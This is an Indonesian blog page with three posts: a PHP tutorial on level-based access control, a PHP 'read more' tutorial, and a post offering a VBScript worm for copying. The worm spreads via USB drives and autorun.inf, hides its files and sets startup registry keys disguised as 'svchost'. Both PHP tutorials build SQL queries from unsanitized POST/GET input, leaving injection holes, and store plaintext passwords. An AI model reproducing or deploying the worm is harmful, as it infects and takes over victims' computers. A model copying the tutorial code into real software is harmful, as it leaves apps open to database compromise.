Selasa, 17 April 2012

Dalam suatu aplikasi bisa jadi terdapat lebih dari satu user dan dengan level yang berbeda-beda. Dengan adanya pembagian level tersebut diharapkan adanya hak akses yang berbeda. Untuk memudahkan Anda dalam membayangkan hal ini, misalkan terdapat 5 user katakanlah A, B, C, D dan E dimana user A, B dan C adalah level ‘administrator’, sedangkan D dan E user biasa. Nah… user A, B, dan C ini misalkan berhak mengakses halaman 1, 2 dan 3 dari aplikasi sedangkan D dan E hanya boleh mengakses halaman 3 saja. Dengan kata lain hak akses ke halaman-halaman tersebut ditentukan oleh level usernya.


Pemberian hak akses pada masing-masing user ini bisa dalam bentuk link menu. Ketika seorang user telah melakukan login, dan loginnya sukses maka akan muncul menu link ke halaman-halaman yang boleh diaksesnya. Sebagai gambaran misalnya pada contoh di atas, setelah user A login dan loginnya berhasil maka akan muncul menu link menuju ke halaman 1, 2 dan 3 karena si A ini levelnya Administrator. Namun untuk si D, karena levelnya user biasa, maka hanya akan muncul menu link menuju halaman 3 saja.

bagaimana seandainya ada user yang nakal? misalkan user E dengan level user biasa kebetulan tahu link URL menuju ke halaman 1. Lantas si E ini mencoba mem bypass link menuju halaman 1 melalui URL langsung tanpa melewati menu link, padahal halaman 1 ini adalah restricted area bagi user biasa (dalam hal ini si E). Nah lo… gimana hayoo?? ya… seorang programmer harus pinter-pinter ngakali. Trus… Gimana ngakalinya? ya… sebelum bagian script yang menampilkan konten pada halaman 1 terlebih dahulu harus mengecek level usernya sebagai ‘administrator’ atau tidak, melalui pengecekan SESSION nya. Jika ya, maka tampilkan kontennya, dan jika tidak maka munculkan pesan

Langsung saja kita menuju tutorialnya, misalkan kita punya data user sebagaimana tersaji dalam tabel berikut ini

CREATE TABLE user (
username varchar(20),
password varchar(20),
level varchar(20),
PRIMARY KEY(username)
);
lalu masukkan data-datanya
INSERT INTO `user` VALUES ('a', 'pass1', 'admin');
INSERT INTO `user` VALUES ('b', 'pass2', 'admin');
INSERT INTO `user` VALUES ('c', 'pass3', 'user');
INSERT INTO `user` VALUES ('d', 'pass4', 'user');
INSERT INTO `user` VALUES ('e', 'pass5', 'user');

selanjutnya kita buat form loginnya.
login.htm
<form method="post" action="loginsubmit.php">
<table border="0">
<tr>
<td>Masukkan Username </td>
<td><input name="username" type="text"></td>
</tr>
<tr>
<td>Masukkan Password </td>
<td><input name="pass" type="password"></td>
</tr>
<tr>
   <td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Submit"></td>
</tr>
</table>
</form>

Form login sudah dibuat, berikutnya kita buat script untuk memproses loginnya.
loginsubmit.php
<?php
// memulai session
session_start();
mysql_connect('dbhost', 'dbuser', 'dbpass');
mysql_select_db('dbname');
$username = $_POST['username'];
$password = $_POST['pass'];
// query untuk mendapatkan record dari username
$query = "SELECT * FROM user WHERE username = '$username'";
$hasil = mysql_query($query);
$data = mysql_fetch_array($hasil);
// cek kesesuaian password
if ($password == $data['password'])
{
echo "<h1>Login Sukses</h1>";
// menyimpan username dan level ke dalam session
$_SESSION['level'] = $data['level'];
$_SESSION['username'] = $data['username'];
// tampilkan menu
include "menu.php";
}
else echo "<h1>Login gagal</h1>";
?>
Bila Anda perhatikan pada script di atas, maka terlihat bahwa menunya membaca script menu.php. Di dalam script menu.php sendiri nantinya terdapat pengecekan level usernya yang tadi tersimpan dalam session sewaktu login sukses. Bila level usernya adalah ‘admin’ maka tampilkan menu link menuju halaman 1, 2, dan 3. Begitu pula untuk level ‘user’.
menu.php
<?php
session_start();
if ($_SESSION['level'] == "admin")
{
// tampilkan menu untuk admin
echo "<a href='hal1.php'>Halaman 1</a> ";
echo "<a href='hal2.php'>Halaman 2</a> ";
echo "<a href='hal3.php'>Halaman 3</a> ";
echo "<a href='logout.php'>Logout</a> ";
}
else if ($_SESSION['level'] == "user")
{
// tampilkan menu untuk user biasa
echo "<a href='hal3.php'>Halaman 3</a>";
echo "<a href='logout.php'>Logout</a> ";
}
?>

Selanjutnya, kita bisa mulai membuat konten pada halaman 1, 2 dan 3. Ingat.. sebelum menampilkan kontennya sebaiknya dicek level usernya terlebih dahulu. Bila levelnya tidak sesuai dengan hak aksesnya, maka jangan ragu untuk menolak. Untuk halaman 1, dari kasus yang kita ambil hanya bisa diakses oleh user berlevel ‘admin’ saja. Begitu pula untuk halaman 2. Namun untuk halaman 3, baik level ‘admin’ maupun ‘user’ biasa boleh mengaksesnya.

hal1.php
<?php
session_start();
// cek apakah user yang mengakses halaman ini sudah melalui login atau belum
// logikanya jika user telah login dan sukses, maka SESSION level dan SESSION username ini pasti sudah ada
// jika ada user yang mencoba akses halaman ini tanpa login, maka logikanya kedua SESSION belum ada
if (isset($_SESSION['level']) && isset($_SESSION['username']))
{
// tampilkan menu.
// menu hanya ditampilkan bila halaman ini diakses oleh user yang telah login
include "menu.php";
// cek level user apakah admin atau bukan
if ($_SESSION['level'] == "admin")
{
// tampilkan konten halaman 1 jika levelnya admin
echo "<h1>Halaman 1</h1>";
echo "<p>Selamat datang di halaman satu wahai user : ".$_SESSION['username']."</p>";
echo "<p>Ini adalah konten halaman 1</p>";
}
else
{
// jika levelnya bukan admin, tampilkan pesan
echo "<h1>Maaf.. Anda bukan user berlevel Administrator</h1>";
}
}
else
{
echo "<h1>Nah.. Anda pasti mencoba akses halaman ini tanpa login ya?</h1>";
}
?>

Untuk halaman 2, konsepnya juga sama seperti script halaman 1 di atas, hanya yang berbeda pada kontennya tentu saja. Sekarang untuk halaman ke-3 di mana yang bisa mengakses adalah semua level user, scriptnya adalah:
hal3.php
<?php
session_start();
if (isset($_SESSION['level']) && isset($_SESSION['username']))
{
include "menu.php";
if (($_SESSION['level'] == "admin") || ($_SESSION['level'] == "user"))
{
echo "<h1>Halaman 3</h1>";
echo "<p>Selamat datang di halaman tiga wahai user : ".$_SESSION['username']."</p>";
echo "<p>Ini adalah konten halaman 3</p>";
}
}
else
{
echo "<h1>Nah.. Anda pasti mencoba akses halaman ini tanpa login ya?</h1>";
}
?>

Pada prinsipnya proses logout adalah menghapus semua session yang tadi terbentuk ketika login sukses.
logout.php
<?php
session_start();
session_destroy();
echo "<h1>Anda sudah logout</h1>";
echo "<p><a href='formlogin.htm'>Login Kembali</a></p>";
?>
Anda bisa download scripnya disini
Sumber : seven cyber
Diposting oleh di Tidak ada komentar:

Membuat Read more dalam php

Kali ini saya akan membahas tentang Read More..... 
ada beberapa langkah untuk membuat nya..
1.Kita buat data base dengan nama " artikel " tanpa tanda kutip..
2.Buatlah table dengan nama " tb_artikel " tanpa tanda kutip..
‘id’ tinyint (1),
‘judul’ varchar (30),
‘isi’ text,
‘penulis’ varchar (30),
PRIMARY KEY (‘id’)
isi tabl
 id = 1
 judul = Migrain
 isi  = Penyakit ini lebih banyak diderita oleh wanita. Migrain adalah
penyakit yang menyerang otak dan mengakibatkan kesakitan baik secara fisik
maupun emosi. Pelebaran pembuluh darah pada otak dan peradangan merupakan
salah satu mengapa kepala terasa sakit. Walau belum diketahui secara pasti
penyebabnya, umumnya penyakit ini merupakan penyakit yang diturunkan.
Yang dapat dilakukan adalah berusaha untuk mencegah terjadinya serangan sakit
kepala dan mengurangi rasa sakit saat serangan terjadi. Kadangkala serangannya
tidak hanya menyerang salah satu sisi kepala tetapi menyerang kedua sisi kepala
 penulis = Aziz 
anda bisa liat hasilnya sbb..
















3.kemudian buat scrip seperti dibawah ini dan simpan artikel.php
<?php
mysql_connect("localhost","root","") or die("Gagal Konek Ke
Server".mysql_error());
mysql_select_db("artikel") or die ("Gagal Konek Ke Database".mysql_error());
?>
<html>
<head>
<title>Artikel</title>
</head>
<body>
<table width="600" border="0" align="center">
<?php
$kueri = mysql_query(" SELECT * FROM tb_artikel ");
while ($baris=mysql_fetch_row($kueri)) {
echo("<tr>");
echo("<td><u>$baris[1]</u></td>");
echo("</tr>");
echo("<tr>");
echo("<td>".substr($baris[2],0,150)." <a
href='artikel_detail.php?id=$baris[0]'>Read More . . .</a> </td>");
echo("</tr>");
echo("<tr>");
echo("<td>Penulis : $baris[3]</td>");
echo("</tr>");
}
?>
</table>
</body>
</html

4.yang terahir simpan dengan artikel_detail.php

<?php
mysql_connect("localhost","root","") or die("Gagal Konek Ke
Server".mysql_error());
mysql_select_db("artikel") or die ("Gagal Konek Ke Database".mysql_error());
?>
<html>
<head>
<title>Artikel Detail</title>
</head>
<body>
<table width="600" border="0" align="center">
<?php
$kode_artikel = $_GET['id'];
$kueri = mysql_query(" SELECT id AS kode_artikel, judul, isi, penulis ".
" FROM tb_artikel WHERE id='$kode_artikel' ");
while ($baris=mysql_fetch_row($kueri)) {
echo("<tr>");
echo("<td><u>$baris[1]</u></td>");
echo("</tr>");
echo("<tr>");
echo("<td>$baris[2]</td>");
echo("</tr>");
echo("<tr>");
echo("<td>Penulis : $baris[3]</td>");
echo("</tr>");
}
?>
</table>
</body>
</html>

Selamat mencoba... semoga berhasil...
Diposting oleh di 2 komentar:

Senin, 02 April 2012

Buat anda yang ingin bejajar membuat virus saya kasih samplenya nih..silahkan anda copy dan simpan berformat".txt "(dot txt) semoga membantu anda untuk menjadi hacker...
Warning!!! Tidak untuk main main

‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
loop

Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)